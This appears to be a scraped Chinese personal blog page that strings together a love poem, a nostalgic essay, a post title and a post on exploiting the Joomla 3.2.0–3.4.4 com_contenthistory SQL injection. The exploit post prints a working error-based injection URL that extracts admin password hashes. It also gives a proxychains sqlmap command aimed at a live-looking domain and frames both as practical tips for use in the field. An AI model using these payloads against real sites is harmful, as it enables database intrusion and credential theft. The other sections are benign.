make life get better

我以诗的名义拥抱你

不知道我该怎样形容,问一遍风,还有雨

不知道我该怎样开始,试着用含蓄凋零深沉

抑制住胸中燃烧的火焰,便少了表情,冷血心底

到马路上去吧,我把月亮驾驭黑夜之上,用电车载着

 

别害怕黄昏,我会说有路灯照着,你不信

一路结伴,笑对翩飞,暗香粉红,牵着手的不是我

和月同步,往事的通通与未来无关,我只想现在

即便是存在无情,我也会熄灭满天繁星,拒绝梦境

 

把视线拉长,阻挡边缘的你

过不去,你就会思索,说我夜谈天长

干枯的眼睛,唇对着黑夜,我等你虑我则他

江边沙滩搅浑你的思念,清纯慰藉一片

 

我悲哀的发现,灯光中有雨点的存在

情绪晃动,雨伞晃动,心有些不自在

你不说他不来,对面如果没有风景,我不明白

如果我选择放弃,一个声音才在耳边响起,天真

 

来自诗歌国度的你,摇摇头说 不

因为曾经付出了,你懂得珍惜

逃避也不是,面对也不是,更不想背叛自己

散发着幽香的气息,红裙女孩,我以诗的名义拥抱你


你会发现你身边的人“少了”

题记

0x01.小时候陪伴我们快乐玩耍的朋友还有多少。那个时候放学在那个小池塘洗澡的人还有多少?

0x02.青春总是不经意间的溜走了,在我们的额头上添了一丝痕迹,却也不明显。

0x03.呵呵,那时的我们还有多少记得起了。有的还在读书,有的结婚生子,有的还在为了梦想追逐。

0x04.有句话说的好”梦想是要有的,万一实现了“,有时候理解成为是一句带有讽刺的话。

0x05.我觉得每天追逐梦想而努力奋斗拼搏的人,才会变成”有钱人“

0x06.有时你会觉得和你以前玩的人渐渐的疏远了你,可能是”物以类聚,人以群分“吧,儿时的朋友,为什么会渐渐疏远你,岁话说”道不同不相为谋“这个世界就是这样的。你不努力就被淘汰。



有的生下来在起跑线上,而王思聪已经到终点

发布了长文章:有的生下来在起跑线上,而王思聪已经到终点

点击查看

发布了长文章:《有的生下来在起跑线上,而王思聪已经到终点》

写着代码困了就在键盘上睡着了

sqlmap利用 Joomla 3.2.0 – 3.4.4 注入漏洞的方法

sqlmap利用 Joomla 3.2.0 – 3.4.4 注入漏洞的方法

最近出了一个 Joomla的注入 影响大批网站

随后有人在sebug上给出了exp

 

漏洞详细说明与利用方法:https://www.trustwave.com/Resources/SpiderLabs-Blog/Joomla-SQL-Injection-Vulnerability-Exploit-Results-in-Full-Administrative-Access/

存在SQL注入的地方位于:/administrator /components /com_contenthistory/ models/history.php

 

直接获取密码的exp

 

http://10.211.55.3/joomla/index.php?option=com_contenthistory&amp;view=history&amp;list[ordering]=&amp;item_id=1&amp;type_id=1&amp;list[<span class="hljs-operator"><span class="hljs-keyword">select</span>]=(<span class="hljs-keyword">select</span> <span class="hljs-number">1</span> <span class="hljs-keyword">from</span> (<span class="hljs-keyword">select</span> <span class="hljs-keyword">count</span>(*),<span class="hljs-keyword">concat</span>((<span class="hljs-keyword">select</span> (<span class="hljs-keyword">select</span> <span class="hljs-keyword">concat</span>(<span class="hljs-keyword">password</span>)) <span class="hljs-keyword">from</span> %<span class="hljs-number">23</span>__users <span class="hljs-keyword">limit</span> <span class="hljs-number">0</span>,<span class="hljs-number">1</span>),<span class="hljs-keyword">floor</span>(<span class="hljs-keyword">rand</span>(<span class="hljs-number">0</span>)*<span class="hljs-number">2</span>))x <span class="hljs-keyword">from</span> information_schema.<span class="hljs-keyword">tables</span> <span class="hljs-keyword">group</span> <span class="hljs-keyword">by</span> x)a)</span>

其中%23_即为joomla表前缀,无需获取表前缀,joomla会自动将#_转换为表前缀。

 

详细请看http://www.sebug.net/vuldb/ssvid-89680

 

—————————————————————————邪恶的分割线————————————————————————

然后实战中有各种不方便的地方 

其实构造一下就可以用sqlmap跑了。。。

proxychains sqlmap -u “http://7kb.org/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=2&type_id=1&list[select]=(*” -v 3 –tech=E

 

同理 很多注入都可以直接构造 丢给sqlmap 比如前段时间出的discuz 7.2注入 没必要写那种脱裤工具

 

7kb.org 原创,转载来自 www.7kb.org


十岁的天空,十年前我才9岁,现在19岁莫名的感受